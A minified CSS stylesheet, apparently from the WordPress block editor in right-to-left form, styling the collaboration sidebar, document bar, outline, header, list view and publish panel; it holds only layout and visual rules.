.interface-complementary-area-header{ display:none; } .editor-collab-sidebar,.editor-collab-sidebar-panel{ height:100%; overflow:hidden; } .editor-collab-sidebar-panel{ padding:16px 16px 24px; } .editor-collab-sidebar-panel__thread{ background-color:#f0f0f0; border:1px solid #ddd; border-radius:8px; overflow:hidden; padding:16px; position:relative; width:auto; } .editor-collab-sidebar-panel__thread.is-selected{ background-color:#fff; box-shadow:0 2px 3px #0000000d,0 4px 5px #0000000a,0 12px 12px #00000008,0 16px 16px #00000005; z-index:1; } .editor-collab-sidebar-panel__thread:focus{ outline:var(--wp-admin-border-width-focus) solid var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-1); } .editor-collab-sidebar-panel__thread.is-floating{ left:16px; margin-top:16px; position:absolute; right:16px; } .editor-collab-sidebar-panel__user-name{ text-transform:capitalize; } .editor-collab-sidebar-panel__user-name,.editor-collab-sidebar-panel__user-time{ color:#757575; font-size:12px; font-weight:400; line-height:16px; text-align:right; } .editor-collab-sidebar-panel__user-comment p:last-child{ margin-bottom:0; } .editor-collab-sidebar-panel__user-avatar{ background:#fff; border-radius:50%; border-style:solid; border-width:var(--wp-admin-border-width-focus); flex-shrink:0; padding:var(--wp-admin-border-width-focus); } .editor-collab-sidebar-panel__comment-status{ margin-right:auto; } .editor-collab-sidebar-panel__comment-status button.has-icon:not(.has-text){ flex-shrink:0; height:24px; min-width:24px; padding:0; width:24px; } .editor-collab-sidebar-panel__comment-dropdown-menu{ flex-shrink:0; } .editor-collab-sidebar-panel__more-reply-separator:after,.editor-collab-sidebar-panel__more-reply-separator:before{ background-color:#ddd; content:""; display:block; flex:1; height:1px; width:100%; } .editor-collab-sidebar-panel__more-reply-button{ font-weight:500; } .editor-collab-sidebar-panel__resolution-text{ font-style:italic; } .editor-collab-sidebar-panel__comment-form textarea{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; padding:6px 8px; } @media not (prefers-reduced-motion){ .editor-collab-sidebar-panel__comment-form textarea{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .editor-collab-sidebar-panel__comment-form textarea{ font-size:13px; line-height:normal; } } .editor-collab-sidebar-panel__comment-form textarea:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); outline:2px solid #0000; } .editor-collab-sidebar-panel__comment-form textarea::-webkit-input-placeholder{ color:#1e1e1e9e; } .editor-collab-sidebar-panel__comment-form textarea::-moz-placeholder{ color:#1e1e1e9e; } .editor-collab-sidebar-panel__comment-form textarea:-ms-input-placeholder{ color:#1e1e1e9e; } .editor-collab-sidebar-panel__comment-form textarea{ display:block; line-height:20px !important; padding:9px 11px; } .editor-collab-sidebar-panel__skip-to-block,.editor-collab-sidebar-panel__skip-to-comment{ background:#fff !important; clip-path:inset(50%); left:-9999px; overflow:hidden; position:absolute; top:-9999px; z-index:-1; } .editor-collab-sidebar-panel__skip-to-block:focus,.editor-collab-sidebar-panel__skip-to-comment:focus{ clip-path:none; left:8px; overflow:visible; z-index:1; } .editor-collab-sidebar-panel__skip-to-comment:focus{ top:8px; } .editor-collab-sidebar-panel__skip-to-block:focus{ bottom:8px; top:auto; } .comment-avatar{ background:#fff; border-radius:50%; border-style:solid; border-width:var(--wp-admin-border-width-focus); box-sizing:border-box; margin-right:-12px; padding:var(--wp-admin-border-width-focus); width:24px; } .comment-avatar:first-child{ margin-right:0; } .show-icon-labels .comment-avatar-indicator{ width:auto; } .show-icon-labels .comment-avatar-indicator div{ display:none; } .show-icon-labels .comment-avatar-indicator:after{ content:attr(aria-label); font-size:12px; } .editor-collapsible-block-toolbar{ align-items:center; display:flex; height:64px; overflow:hidden; } .editor-collapsible-block-toolbar .block-editor-block-contextual-toolbar{ background:#0000; border-bottom:0; height:100%; } .editor-collapsible-block-toolbar .block-editor-block-toolbar{ height:100%; padding-top:17px; } .editor-collapsible-block-toolbar .block-editor-block-toolbar .components-button:not(.block-editor-block-mover-button){ height:32px; } .editor-collapsible-block-toolbar:after{ background-color:#ddd; content:""; height:24px; margin-left:7px; width:1px; } .editor-collapsible-block-toolbar .components-toolbar,.editor-collapsible-block-toolbar .components-toolbar-group{ border-left:none; position:relative; } .editor-collapsible-block-toolbar .components-toolbar-group:after,.editor-collapsible-block-toolbar .components-toolbar:after{ background-color:#ddd; content:""; height:24px; left:-1px; position:absolute; top:4px; width:1px; } .editor-collapsible-block-toolbar .components-toolbar .components-toolbar-group.components-toolbar-group:after,.editor-collapsible-block-toolbar .components-toolbar-group .components-toolbar-group.components-toolbar-group:after{ display:none; } .editor-collapsible-block-toolbar .block-editor-block-mover.is-horizontal .block-editor-block-mover-button{ height:32px; overflow:visible; } @media (min-width:600px){ .editor-collapsible-block-toolbar .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container{ height:40px; position:relative; top:-4px; } } .editor-collapsible-block-toolbar.is-collapsed{ display:none; } .editor-content-only-settings-menu__description{ min-width:235px; padding:8px; } .editor-block-visibility__disabled-blocks-count{ background-color:#fff; border:1px solid #ddd; border-width:1px 0; box-shadow:32px 0 0 0 #fff,-32px 0 0 0 #fff; padding:8px; position:sticky; text-align:center; top:-5px; z-index:2; } .editor-block-visibility__disabled-blocks-count~.block-editor-block-manager__content .block-editor-block-manager__category-title{ top:31px; } .editor-block-visibility__disabled-blocks-count .is-link{ margin-right:12px; } .editor-blog-title-dropdown__content .components-popover__content{ min-width:320px; padding:16px; } .editor-document-bar{ align-items:center; background:#f0f0f0; border-radius:4px; display:flex; height:32px; justify-content:space-between; min-width:0; width:min(100%, 450px); } .editor-document-bar:hover{ background-color:#e0e0e0; } .editor-document-bar .components-button{ border-radius:4px; } @media not (prefers-reduced-motion){ .editor-document-bar .components-button{ transition:all .1s ease-out; } } .editor-document-bar .components-button:hover{ background:#e0e0e0; } @media screen and (min-width:782px) and (max-width:960px){ .editor-document-bar.has-back-button .editor-document-bar__post-type-label{ display:none; } } .editor-document-bar__command{ color:var(--wp-block-synced-color); flex-grow:1; overflow:hidden; } .editor-document-bar__title{ color:#1e1e1e; margin:0 auto; max-width:70%; overflow:hidden; } @media (min-width:782px){ .editor-document-bar__title{ padding-right:24px; } } .editor-document-bar__title h1{ align-items:center; display:flex; font-weight:400; justify-content:center; overflow:hidden; white-space:nowrap; } .editor-document-bar__post-title{ color:currentColor; flex:1; overflow:hidden; text-overflow:ellipsis; } .editor-document-bar__post-type-label{ color:#2f2f2f; flex:0; padding-right:4px; } @media screen and (max-width:600px){ .editor-document-bar__post-type-label{ display:none; } } .editor-document-bar__shortcut{ color:#2f2f2f; display:none; min-width:24px; } @media (min-width:782px){ .editor-document-bar__shortcut{ display:initial; } } .editor-document-bar__back.components-button.has-icon.has-text{ color:#757575; flex-shrink:0; gap:0; min-width:36px; position:absolute; z-index:1; } .editor-document-bar__back.components-button.has-icon.has-text:hover{ background-color:initial; color:#1e1e1e; } .editor-document-bar__icon-layout.editor-document-bar__icon-layout{ display:none; margin-right:12px; pointer-events:none; position:absolute; } .editor-document-bar__icon-layout.editor-document-bar__icon-layout svg{ fill:#949494; } @media (min-width:600px){ .editor-document-bar__icon-layout.editor-document-bar__icon-layout{ display:flex; } } .document-outline{ margin:20px 0; } .document-outline ul{ margin:0; padding:0; } .document-outline__item{ display:flex; margin:4px 0; } .document-outline__item a{ text-decoration:none; } .document-outline__item .document-outline__emdash:before{ color:#ddd; margin-left:4px; } .document-outline__item.is-h2 .document-outline__emdash:before{ content:"—"; } .document-outline__item.is-h3 .document-outline__emdash:before{ content:"——"; } .document-outline__item.is-h4 .document-outline__emdash:before{ content:"———"; } .document-outline__item.is-h5 .document-outline__emdash:before{ content:"————"; } .document-outline__item.is-h6 .document-outline__emdash:before{ content:"—————"; } .document-outline__button{ align-items:flex-start; background:none; border:none; border-radius:2px; color:#1e1e1e; cursor:pointer; display:flex; margin:0 -1px 0 0; padding:2px 1px 2px 5px; text-align:right; } .document-outline__button:disabled,.document-outline__button[aria-disabled=true]{ color:#757575; cursor:default; } .document-outline__button:focus{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .document-outline__level{ background:#ddd; border-radius:3px; color:#1e1e1e; font-size:13px; margin-left:4px; padding:1px 6px; } .is-invalid .document-outline__level{ background:#f0b849; } .document-outline__item-content{ padding:1px 0; } .editor-document-outline.has-no-headings>svg{ margin-top:28px; } .editor-document-outline.has-no-headings>p{ padding-left:32px; padding-right:32px; } .editor-document-outline.has-no-headings{ color:#757575; text-align:center; } .editor-document-tools{ align-items:center; display:inline-flex; } .editor-document-tools .editor-document-tools__left>.editor-history__redo,.editor-document-tools .editor-document-tools__left>.editor-history__undo{ display:none; } @media (min-width:782px){ .editor-document-tools .editor-document-tools__left>.editor-history__redo,.editor-document-tools .editor-document-tools__left>.editor-history__undo{ display:inline-flex; } } .editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle{ display:inline-flex; } @media not (prefers-reduced-motion){ .editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle svg{ transition:transform .2s cubic-bezier(.165, .84, .44, 1); } } .editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle.is-pressed svg{ transform:rotate(-45deg); } .editor-document-tools .block-editor-list-view{ display:none; } @media (min-width:600px){ .editor-document-tools .block-editor-list-view{ display:flex; } } .editor-document-tools .editor-document-tools__left>.components-button.has-icon,.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon{ height:32px; min-width:32px; padding:4px; } .editor-document-tools .editor-document-tools__left>.components-button.has-icon.is-pressed,.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon.is-pressed{ background:#1e1e1e; } .editor-document-tools .editor-document-tools__left>.components-button.has-icon:focus:not(:disabled),.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon:focus:not(:disabled){ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color), inset 0 0 0 1px #fff; outline:1px solid #0000; } .editor-document-tools .editor-document-tools__left>.components-button.has-icon:before,.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon:before{ display:none; } .editor-document-tools__left{ align-items:center; display:inline-flex; gap:8px; } .editor-document-tools__left:not(:last-child){ margin-inline-end:8px; } .show-icon-labels .editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle.has-icon{ padding:0 8px; width:auto; } .show-icon-labels .editor-document-tools__left>*+*{ margin-right:8px; } .editor-editor-interface .entities-saved-states__panel-header{ height:65px; } .editor-editor-interface .interface-interface-skeleton__content{ isolation:isolate; } .editor-visual-editor{ flex:1 0 auto; } .components-editor-notices__dismissible,.components-editor-notices__pinned{ color:#1e1e1e; left:0; position:relative; right:0; top:0; } .components-editor-notices__dismissible .components-notice,.components-editor-notices__pinned .components-notice{ border-bottom:1px solid #0003; box-sizing:border-box; min-height:64px; padding:0 12px; } .components-editor-notices__dismissible .components-notice .components-notice__dismiss,.components-editor-notices__pinned .components-notice .components-notice__dismiss{ margin-top:12px; } .entities-saved-states__panel-header{ background:#fff; border-bottom:1px solid #ddd; box-sizing:border-box; height:64px; padding-left:16px; padding-right:16px; } .entities-saved-states__text-prompt{ padding:16px 16px 4px; } .entities-saved-states__text-prompt .entities-saved-states__text-prompt--header{ display:block; margin-bottom:12px; } .entities-saved-states__panel.is-inline .entities-saved-states__text-prompt{ padding:0; } .entities-saved-states__panel.is-inline .entities-saved-states__panel-body{ border:0; padding-left:0; padding-right:0; } .entities-saved-states__panel.is-inline .entities-saved-states__panel-body>h2{ margin-bottom:0; margin-left:-16px; margin-right:-16px; } .entities-saved-states__panel.is-inline .entities-saved-states__panel-body>h2 button{ font-size:11px; text-transform:uppercase; } .entities-saved-states__panel.is-inline .entities-saved-states__text-prompt--header-wrapper{ display:none; } .entities-saved-states__panel.is-inline .entities-saved-states__text-prompt--changes-count{ margin-bottom:8px; margin-top:0; } .entities-saved-states__panel.is-inline .entities-saved-states__panel-footer{ margin-top:16px; } .entities-saved-states__change-control{ flex:1; } .entities-saved-states__changes{ font-size:13px; list-style:disc; margin:4px 24px 0 16px; } .entities-saved-states__changes li{ margin-bottom:4px; } .editor-error-boundary{ background-color:#fff; border:1px solid #1e1e1e; border-radius:2px; box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; margin:64px auto auto; max-width:780px; padding:1em; } .editor-header{ box-sizing:border-box; } .editor-header *,.editor-header :after,.editor-header :before{ box-sizing:inherit; } .editor-header{ background:#fff; display:grid; grid-auto-flow:row; grid-template:auto/64px minmax(0, max-content) minmax(min-content, 1fr) 64px; height:64px; } .editor-header:has(>.editor-header__center){ grid-template:auto/64px min-content 1fr min-content 64px; } @media (min-width:782px){ .editor-header:has(>.editor-header__center){ grid-template:auto/64px minmax(min-content, 2fr) 2.5fr minmax(min-content, 2fr) 64px; } } @media (min-width:480px){ .editor-header{ gap:16px; } } .editor-header{ align-items:center; justify-content:space-between; max-width:100vw; } @media (min-width:280px){ .editor-header{ flex-wrap:nowrap; } } .editor-header__toolbar{ grid-column:1 / 3; } .editor-header__toolbar>:first-child{ margin-inline:16px 0; } .editor-header__back-button+.editor-header__toolbar{ grid-column:2 / 3; } @media (min-width:480px){ .editor-header__back-button+.editor-header__toolbar>:first-child{ margin-inline:0; } } .editor-header__toolbar{ align-items:center; clip-path:inset(-2px); display:flex; min-width:0; } @media (min-width:480px){ .editor-header__toolbar{ clip-path:none; } } .editor-header__toolbar .table-of-contents{ display:none; } @media (min-width:600px){ .editor-header__toolbar .table-of-contents{ display:block; } } .editor-header__toolbar .editor-collapsible-block-toolbar,.editor-header__toolbar .editor-collapsible-block-toolbar.is-collapsed~.editor-collapsible-block-toolbar__toggle{ margin-inline:8px 0; } .editor-header__center{ align-items:center; clip-path:inset(-2px); display:flex; grid-column:3 / 4; justify-content:center; min-width:0; } @media (max-width:479px){ .editor-header__center>:first-child{ margin-inline-start:8px; } .editor-header__center>:last-child{ margin-inline-end:8px; } } .editor-header__settings{ grid-column:3 / -1; } .editor-header:has(>.editor-header__center) .editor-header__settings{ grid-column:4 / -1; } .editor-header__settings{ align-items:center; display:inline-flex; flex-wrap:nowrap; justify-self:end; padding-left:4px; } @media (min-width:600px){ .editor-header__settings{ padding-left:8px; } } .editor-header__settings{ gap:8px; } .show-icon-labels .editor-header .components-button.has-icon,.show-icon-labels.interface-pinned-items .components-button.has-icon{ width:auto; } .show-icon-labels .editor-header .components-button.has-icon svg,.show-icon-labels.interface-pinned-items .components-button.has-icon svg{ display:none; } .show-icon-labels .editor-header .components-button.has-icon:after,.show-icon-labels.interface-pinned-items .components-button.has-icon:after{ content:attr(aria-label); white-space:nowrap; } .show-icon-labels .editor-header .components-button.has-icon[aria-disabled=true],.show-icon-labels.interface-pinned-items .components-button.has-icon[aria-disabled=true]{ background-color:initial; } .show-icon-labels .editor-header .is-tertiary:active,.show-icon-labels.interface-pinned-items .is-tertiary:active{ background-color:initial; box-shadow:0 0 0 1.5px var(--wp-admin-theme-color); } .show-icon-labels .editor-header .components-button.has-icon.button-toggle svg,.show-icon-labels.interface-pinned-items .components-button.has-icon.button-toggle svg{ display:block; } .show-icon-labels .editor-header .components-button.has-icon.button-toggle:after,.show-icon-labels.interface-pinned-items .components-button.has-icon.button-toggle:after{ content:none; } .show-icon-labels .editor-header .components-menu-items-choice .components-menu-items__item-icon.components-menu-items__item-icon,.show-icon-labels.interface-pinned-items .components-menu-items-choice .components-menu-items__item-icon.components-menu-items__item-icon{ display:block; } .show-icon-labels .editor-header .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels .editor-header .interface-pinned-items .components-button,.show-icon-labels.interface-pinned-items .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels.interface-pinned-items .interface-pinned-items .components-button{ padding-left:8px; padding-right:8px; } @media (min-width:600px){ .show-icon-labels .editor-header .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels .editor-header .interface-pinned-items .components-button,.show-icon-labels.interface-pinned-items .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels.interface-pinned-items .interface-pinned-items .components-button{ padding-left:12px; padding-right:12px; } } .show-icon-labels .editor-header .editor-post-save-draft.editor-post-save-draft:after,.show-icon-labels .editor-header .editor-post-saved-state.editor-post-saved-state:after,.show-icon-labels.interface-pinned-items .editor-post-save-draft.editor-post-save-draft:after,.show-icon-labels.interface-pinned-items .editor-post-saved-state.editor-post-saved-state:after{ content:none; } .show-icon-labels .editor-header__toolbar .block-editor-block-mover{ border-right:none; } .show-icon-labels .editor-header__toolbar .block-editor-block-mover:before{ background-color:#ddd; content:""; height:24px; margin-right:8px; margin-top:4px; width:1px; } .show-icon-labels .editor-header__toolbar .block-editor-block-mover .block-editor-block-mover__move-button-container:before{ background:#ddd; right:calc(50% + 1px); width:calc(100% - 24px); } .show-icon-labels.interface-pinned-items{ border-bottom:1px solid #ccc; display:block; margin:0 -12px; padding:6px 12px 12px; } .show-icon-labels.interface-pinned-items>.components-button.has-icon{ justify-content:flex-start; margin:0; padding:6px 8px 6px 6px; width:14.625rem; } .show-icon-labels.interface-pinned-items>.components-button.has-icon[aria-expanded=true] svg{ display:block; max-width:24px; } .show-icon-labels.interface-pinned-items>.components-button.has-icon[aria-expanded=false]{ padding-right:40px; } .show-icon-labels.interface-pinned-items>.components-button.has-icon svg{ margin-left:8px; } @media (min-width:480px){ .editor-header__post-preview-button{ display:none; } } .editor-editor-interface.is-distraction-free .interface-interface-skeleton__header{ border-bottom:none; } .editor-editor-interface.is-distraction-free .editor-header{ background-color:#fff; width:100%; } @media (min-width:782px){ .editor-editor-interface.is-distraction-free .editor-header{ box-shadow:0 1px 0 0 rgba(0,0,0,.133); position:absolute; } } .editor-editor-interface.is-distraction-free .editor-header>.edit-post-header__settings>.edit-post-header__post-preview-button{ visibility:hidden; } .editor-editor-interface.is-distraction-free .editor-header>.editor-header__settings>.editor-preview-dropdown,.editor-editor-interface.is-distraction-free .editor-header>.editor-header__settings>.editor-zoom-out-toggle,.editor-editor-interface.is-distraction-free .editor-header>.editor-header__settings>.interface-pinned-items,.editor-editor-interface.is-distraction-free .editor-header>.editor-header__toolbar .editor-document-tools__document-overview-toggle{ display:none; } .editor-editor-interface.is-distraction-free .interface-interface-skeleton__header:focus-within{ opacity:1 !important; } .editor-editor-interface.is-distraction-free .interface-interface-skeleton__header:focus-within div{ transform:translateX(0) translateZ(0) !important; } .editor-editor-interface.is-distraction-free .components-editor-notices__dismissible{ position:absolute; z-index:35; } .components-popover.more-menu-dropdown__content{ z-index:99998; } .editor-inserter-sidebar{ box-sizing:border-box; } .editor-inserter-sidebar *,.editor-inserter-sidebar :after,.editor-inserter-sidebar :before{ box-sizing:inherit; } .editor-inserter-sidebar{ display:flex; flex-direction:column; height:100%; } .editor-inserter-sidebar__content{ height:100%; } .editor-keyboard-shortcut-help-modal__section{ margin:0 0 2rem; } .editor-keyboard-shortcut-help-modal__section-title{ font-size:.9rem; font-weight:600; } .editor-keyboard-shortcut-help-modal__shortcut{ align-items:baseline; border-top:1px solid #ddd; display:flex; margin-bottom:0; padding:.6rem 0; } .editor-keyboard-shortcut-help-modal__shortcut:last-child{ border-bottom:1px solid #ddd; } .editor-keyboard-shortcut-help-modal__shortcut:empty{ display:none; } .editor-keyboard-shortcut-help-modal__shortcut-term{ font-weight:600; margin:0 1rem 0 0; text-align:left; } .editor-keyboard-shortcut-help-modal__shortcut-description{ flex:1; margin:0; } .editor-keyboard-shortcut-help-modal__shortcut-key-combination{ background:none; display:block; margin:0; padding:0; } .editor-keyboard-shortcut-help-modal__shortcut-key-combination+.editor-keyboard-shortcut-help-modal__shortcut-key-combination{ margin-top:10px; } .editor-keyboard-shortcut-help-modal__shortcut-key{ border-radius:8%; margin:0 .2rem; padding:.25rem .5rem; } .editor-keyboard-shortcut-help-modal__shortcut-key:last-child{ margin:0 .2rem 0 0; } .editor-list-view-sidebar{ height:100%; } @media (min-width:782px){ .editor-list-view-sidebar{ width:350px; } } .editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{ height:100%; } .editor-list-view-sidebar__list-view-container>.document-outline::-webkit-scrollbar,.editor-list-view-sidebar__list-view-panel-content::-webkit-scrollbar{ height:12px; width:12px; } .editor-list-view-sidebar__list-view-container>.document-outline::-webkit-scrollbar-track,.editor-list-view-sidebar__list-view-panel-content::-webkit-scrollbar-track{ background-color:initial; } .editor-list-view-sidebar__list-view-container>.document-outline::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:initial; border:3px solid #0000; border-radius:8px; } .editor-list-view-sidebar__list-view-container>.document-outline:focus-within::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-container>.document-outline:focus::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-container>.document-outline:hover::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content:focus-within::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content:focus::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content:hover::-webkit-scrollbar-thumb{ background-color:#949494; } .editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{ scrollbar-color:#0000 #0000; scrollbar-gutter:stable both-edges; scrollbar-width:thin; } .editor-list-view-sidebar__list-view-container>.document-outline:focus,.editor-list-view-sidebar__list-view-container>.document-outline:focus-within,.editor-list-view-sidebar__list-view-container>.document-outline:hover,.editor-list-view-sidebar__list-view-panel-content:focus,.editor-list-view-sidebar__list-view-panel-content:focus-within,.editor-list-view-sidebar__list-view-panel-content:hover{ scrollbar-color:#949494 #0000; } .editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{ will-change:transform; } @media (hover:none){ .editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{ scrollbar-color:#949494 #0000; } } .editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{ overflow:auto; padding:4px; scrollbar-gutter:auto; } .editor-list-view-sidebar__list-view-container{ display:flex; flex-direction:column; height:100%; } .editor-list-view-sidebar__tab-panel{ height:100%; } .editor-list-view-sidebar__outline{ border-bottom:1px solid #ddd; display:flex; flex-direction:column; gap:8px; padding:16px; } .editor-list-view-sidebar__outline>div>span:first-child{ display:inline-block; width:90px; } .editor-list-view-sidebar__outline>div>span{ color:#757575; font-size:12px; line-height:1.4; } .editor-post-order__panel,.editor-post-parent__panel{ padding-top:8px; } .editor-post-order__panel .editor-post-panel__row-control>div,.editor-post-parent__panel .editor-post-panel__row-control>div{ width:100%; } .editor-post-order__panel-dialog .editor-post-order,.editor-post-order__panel-dialog .editor-post-parent,.editor-post-parent__panel-dialog .editor-post-order,.editor-post-parent__panel-dialog .editor-post-parent{ margin:8px; } .editor-post-order__panel-dialog .components-popover__content,.editor-post-parent__panel-dialog .components-popover__content{ min-width:320px; } .editor-post-author__panel{ padding-top:8px; } .editor-post-author__panel .editor-post-panel__row-control>div{ width:100%; } .editor-post-author__panel-dialog .editor-post-author{ margin:8px; min-width:248px; } .editor-action-modal{ z-index:1000001; } .editor-post-card-panel__content{ flex-grow:1; } .editor-post-card-panel__title{ width:100%; } .editor-post-card-panel__title.editor-post-card-panel__title{ align-items:center; column-gap:8px; display:flex; flex-wrap:wrap; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:500; line-height:20px; margin:0; row-gap:4px; word-break:break-word; } .editor-post-card-panel__icon{ flex:0 0 24px; height:24px; width:24px; } .editor-post-card-panel__header{ display:flex; justify-content:space-between; } .editor-post-card-panel.has-description .editor-post-card-panel__header{ margin-bottom:8px; } .editor-post-card-panel .editor-post-card-panel__title-name{ padding:2px 0; } .editor-post-card-panel .editor-post-card-panel__description,.editor-post-content-information{ color:#757575; } .editor-post-content-information .components-text{ color:inherit; } .editor-post-discussion__panel-dialog .editor-post-discussion{ margin:8px; min-width:248px; } .editor-post-discussion__panel-toggle .components-text{ color:inherit; } .editor-post-discussion__panel-dialog .components-popover__content{ min-width:320px; } .editor-post-excerpt__textarea{ margin-bottom:10px; width:100%; } .editor-post-excerpt__dropdown__content .components-popover__content{ min-width:320px; padding:16px; } .editor-post-featured-image{ padding:0; } .editor-post-featured-image .hidden{ display:none; } .editor-post-featured-image .components-spinner{ margin-right:-9px; margin-top:-9px; position:absolute; right:50%; top:50%; } .editor-post-featured-image__container{ position:relative; } .editor-post-featured-image__container:focus .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-is-requesting-image),.editor-post-featured-image__container:focus-within .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-is-requesting-image),.editor-post-featured-image__container:hover .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-is-requesting-image){ opacity:1; } .editor-post-featured-image__container .editor-post-featured-image__actions.editor-post-featured-image__actions-missing-image{ margin-top:16px; opacity:1; } .editor-post-featured-image__container .components-drop-zone__content{ border-radius:2px; } .editor-post-featured-image__container:has(.editor-post-featured-image__toggle) .components-drop-zone .components-drop-zone__content-inner{ align-items:center; display:flex; gap:8px; } .editor-post-featured-image__container:has(.editor-post-featured-image__toggle) .components-drop-zone .components-drop-zone__content-inner .components-drop-zone__content-icon{ margin:0; } .editor-post-featured-image__preview,.editor-post-featured-image__toggle{ box-shadow:0 0 0 0 var(--wp-admin-theme-color); display:flex; justify-content:center; min-height:40px; outline-offset:-1px; overflow:hidden; padding:0; width:100%; } .editor-post-featured-image__preview{ height:auto !important; outline:1px solid #0000001a; } .editor-post-featured-image__preview .editor-post-featured-image__preview-image{ aspect-ratio:2/1; object-fit:cover; object-position:50% 50%; width:100%; } .editor-post-featured-image__toggle{ box-shadow:inset 0 0 0 1px #ccc; } .editor-post-featured-image__toggle:focus:not(:disabled){ box-shadow:0 0 0 currentColor inset, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-missing-image){ bottom:0; opacity:0; padding:8px; position:absolute; } @media not (prefers-reduced-motion){ .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-missing-image){ transition:opacity 50ms ease-out; } } .editor-post-featured-image__actions:not(.editor-post-featured-image__actions-missing-image) .editor-post-featured-image__action{ backdrop-filter:blur(16px) saturate(180%); background:#ffffffbf; } .editor-post-featured-image__actions .editor-post-featured-image__action{ flex-grow:1; justify-content:center; } [class].editor-post-format__suggestion{ margin:4px 0 0; } .editor-post-format__dialog .editor-post-format__dialog-content{ margin:8px; min-width:248px; } .editor-post-last-edited-panel{ color:#757575; } .editor-post-last-edited-panel .components-text{ color:inherit; } .editor-post-last-revision__title{ font-weight:500; width:100%; } .editor-post-last-revision__title.components-button.has-icon{ height:100%; justify-content:space-between; } .editor-post-last-revision__title.components-button.has-icon:active,.editor-post-last-revision__title.components-button.has-icon:hover{ background:#f0f0f0; } .editor-post-last-revision__title.components-button.has-icon:focus{ border-radius:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .components-panel__body.is-opened.editor-post-last-revision__panel{ height:48px; padding:0; } .components-panel__body.is-opened.editor-post-last-revision__panel .editor-post-last-revision__title.components-button.components-button{ padding:16px; } .editor-private-post-last-revision__button{ display:inline-block; } .editor-post-locked-modal__buttons{ margin-top:24px; } .editor-post-locked-modal__avatar{ border-radius:50%; margin-top:16px; min-width:auto !important; } .editor-post-panel__row{ align-items:flex-start !important; justify-content:flex-start !important; min-height:32px; width:100%; } .editor-post-panel__row-label{ align-items:center; display:flex; flex-shrink:0; hyphens:auto; line-height:20px; min-height:32px; padding:6px 0; width:38%; } .editor-post-panel__row-control{ align-items:center; display:flex; flex-grow:1; min-height:32px; } .editor-post-panel__row-control .components-button{ height:auto; max-width:100%; min-height:32px; text-align:right; text-wrap:balance; text-wrap:pretty; white-space:normal; } .editor-post-panel__row-control .components-dropdown{ max-width:100%; } .editor-post-panel__section{ padding:16px; } .editor-post-publish-panel__content{ min-height:calc(100% - 148px); } .editor-post-publish-panel__content>.components-spinner{ display:block; margin:100px auto 0; } .editor-post-publish-panel__header{ align-content:space-between; align-items:center; background:#fff; border-bottom:1px solid #ddd; display:flex; height:65px; padding-left:16px; padding-right:16px; } .editor-post-publish-panel__header .components-button{ justify-content:center; width:100%; } .editor-post-publish-panel__header .has-icon{ margin-right:auto; width:auto; } .components-site-card{ align-items:center; display:flex; margin:16px 0; } .components-site-icon{ border:none; border-radius:2px; flex-shrink:0; height:36px; margin-left:12px; width:36px; } .components-site-name{ display:block; font-size:14px; } .components-site-home{ color:#757575; display:block; font-size:12px; word-break:break-word; } .editor-post-publish-panel__header-cancel-button,.editor-post-publish-panel__header-publish-button{ flex:1; } @media (min-width:480px){ .editor-post-publish-panel__header-cancel-button,.editor-post-publish-panel__header-publish-button{ max-width:160px; } } .editor-post-publish-panel__header-publish-button{ justify-content:center; padding-right:4px; } .editor-post-publish-panel__header-cancel-button{ padding-left:4px; } .editor-post-publish-panel__header-published{ flex-grow:1; } .editor-post-publish-panel__footer{ padding:16px; } 